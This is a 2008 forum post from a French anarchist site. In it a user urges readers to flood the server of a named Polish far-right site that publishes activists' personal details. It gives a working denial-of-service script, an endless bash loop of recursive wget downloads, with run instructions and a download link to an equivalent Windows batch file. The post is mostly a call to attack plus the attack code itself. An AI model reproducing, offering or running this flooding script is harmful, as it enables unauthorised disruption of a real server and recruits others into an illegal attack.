Red Watch

Site de la CNT-AIT Caen et forum Rouge & Noir, Internet, p2p, logiciels libres...

Red Watch

Messagepar Dan » Mercredi 13 Fév 2008 23:48

Hi,

as you may know, some of polish nazis run a site ( http://www. redwatch . info ), which contains detailed personal information about polish human rights activists, gays, lesbians, anarchists etc.

Unfortunately, this site is placed on server in the US, so there's no possibility to take any legal action against them due to First Amendment of the US Constitution.

Nevertheless, we may try to impede their lifes. How? Just overload their server with this simple script.

Here it is:

1) for the Windows users:

Download this file: www.streetterror.pl/kiluj.zip

This bat executes in endless loop two commands - download redwatch . info (by wget) and delete downloaded files. It's really easy and will not load much of your cpu.

2) for the Linux users:

bash script: kill.sh


#!/bin/bash
x=1;
while [ $x -le 2 ];
do
wget -r -l1 --delete-after http://www. redwatch . info/
done

(don't forget to set it executable: chmod +x kill.sh )

then run in command line by typing:
./kill.sh

More info (in polish): http://forum.hard-core.pl/viewtopic.php?t=21826

Thanks for your help. Spread the word.
Dan
 

Retourner vers Rayon informatique

cron